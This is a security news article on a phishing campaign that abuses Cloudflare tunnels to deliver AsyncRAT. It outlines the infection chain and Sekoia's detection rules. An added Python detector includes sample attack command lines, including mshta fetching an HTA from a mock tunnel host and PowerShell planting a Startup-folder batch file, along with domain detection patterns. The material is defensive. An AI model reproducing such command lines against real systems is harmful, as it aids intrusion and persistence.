Cyber Security News

Hackers Exploit Cloudflare Tunnel Infrastructure to Deploy Multiple Remote Access Trojans

The Sekoia TDR (Threat Detection & Research) team has reported on a network infrastructure, described in its report “Cloudflare tunnel infrastructure to deliver multiple RATs”, that attackers have been using since at least February 2024.

This infrastructure has been utilized to host malicious files and distribute remote access trojans (RATs), including the notorious AsyncRAT.

Infection chains distributing AsyncRAT

Complex Infection Chains and Persistent Tactics

The infection chain begins with a phishing email, which often masquerades as legitimate business correspondence like invoices or orders, to deceive recipients into opening an attachment.

The attachment in question is typically an old “application/windows-library+xml” file type.

Although this file type can be blocked at email gateways, it is not always flagged, because it may be judged less risky than binary attachments.

Upon opening, this file triggers a connection to a WebDAV resource hosted within the Cloudflare infrastructure, setting off a multi-step execution process.

Initial Access and Execution: The phishing email’s attachment leads users to a deceptive LNK file, which, instead of opening the promised PDF, executes an HTML Application (HTA) file. This HTA file uses VBScript to launch a batch file (BAT) that sets up Python on the victim’s machine. The batch script uses PowerShell to download and install the dependencies it needs, including Python, which is then used to obfuscate and run the later stages of the attack.

LNK file properties pointing to the HTA file

Defense Evasion and Persistence: To evade detection, attackers employ techniques like modifying file attributes to hide installation folders and using scripts to clean up traces after the initial setup. Persistence is achieved by placing malicious scripts in the Windows Startup folder, ensuring that the malware persists across system reboots.

Detection and Monitoring

Sekoia’s detection strategy includes a combination of Sigma rules and custom queries in their Sekoia Operative Language (SOL).

These rules are designed to catch the various stages of the attack at multiple points, from phishing email attachments to PowerShell commands used for reflective loading of payloads.

For instance, rules like “Suspicious Email Attachment Received” help filter out potentially harmful attachments, while “Mshta Suspicious Child Process” and “Dynamic DNS Contacted” pinpoint execution and command-and-control (C2) activities.
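As an added illustration that is not part of the article or of Sekoia’s published rules, the following Python pass runs three checks over constructed, simplified telemetry: an mshta-spawning-a-shell check and a tunnel/dynamic-DNS check in the spirit of the rule names above, plus a Startup-folder persistence check for the chain described in the previous section. Event field names, hostnames and the extra rule names are assumptions.

```python
# Added example, not from the article or Sekoia. Field names, sample
# events and hostnames are constructed to resemble the described chain.
import re

EVENTS = [  # constructed process-creation and DNS events
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\ben.bat"'},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe \\mock-tunnel-name-here.trycloudflare.com@SSL\DavWWWRoot\x.hta"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden Copy-Item run.bat 'C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat'"},
    {"type": "dns", "image": r"C:\Users\victim\AppData\Local\Temp\python\pythonw.exe",
     "query": "mock-c2-name.duckdns.org"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\victim\Documents\report.docx'},
]

# Script hosts and shells that are unusual children of mshta.exe.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                       "cscript.exe", "python.exe", "pythonw.exe"}
# Hosting services abused in the campaign: Cloudflare quick tunnels and DuckDNS.
ABUSED_DOMAINS = re.compile(r"[\w-]+\.(?:trycloudflare\.com|duckdns\.org)\b", re.I)
# Per-user Startup folder, the persistence location named in the article.
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return the names of the checks this single event matches (may be empty)."""
    hits = []
    if event["type"] == "process":
        if basename(event["parent"]) == "mshta.exe" and basename(event["image"]) in SUSPICIOUS_CHILDREN:
            hits.append("Mshta Suspicious Child Process")
        if STARTUP_DIR.search(event["cmdline"]):
            hits.append("Startup Folder Persistence")
        if ABUSED_DOMAINS.search(event["cmdline"]):
            hits.append("WebDAV Path To Tunnel Host")
    elif event["type"] == "dns" and ABUSED_DOMAINS.search(event["query"]):
        hits.append("Dynamic DNS Contacted")
    return hits

def run(events=EVENTS):
    """Map each event index to its alerts; events with no alert are omitted."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}

if __name__ == "__main__":
    for i, names in run().items():
        print(i, names)
```

In real telemetry the parent/child and command-line fields come from Sysmon or EDR process-creation events and the query from DNS logs; the benign Word event is included to show that the checks stay quiet on ordinary activity.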

This report underscores the challenges faced by security professionals in detecting and thwarting such advanced and evolving threats.

The attackers’ use of legitimate-looking infrastructure and sophisticated evasion techniques highlights the ongoing cat-and-mouse game in cybersecurity.

Sekoia TDR remains committed to monitoring this and similar threats, refining detection methods to keep ahead of attackers’ tactics.

The use of Cloudflare’s infrastructure for these malicious purposes demonstrates the ingenuity of modern cybercriminals and the necessity for continuous adaptation in defense mechanisms.

The research also emphasizes the importance of integrating threat intelligence feeds with real-time detection capabilities to dismantle these sophisticated attack vectors effectively.

This detailed analysis not only sheds light on the methods employed by attackers but also serves as a blueprint for organizations to enhance their security measures against such insidious threats.

Indicators of Compromise (IoCs):



Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
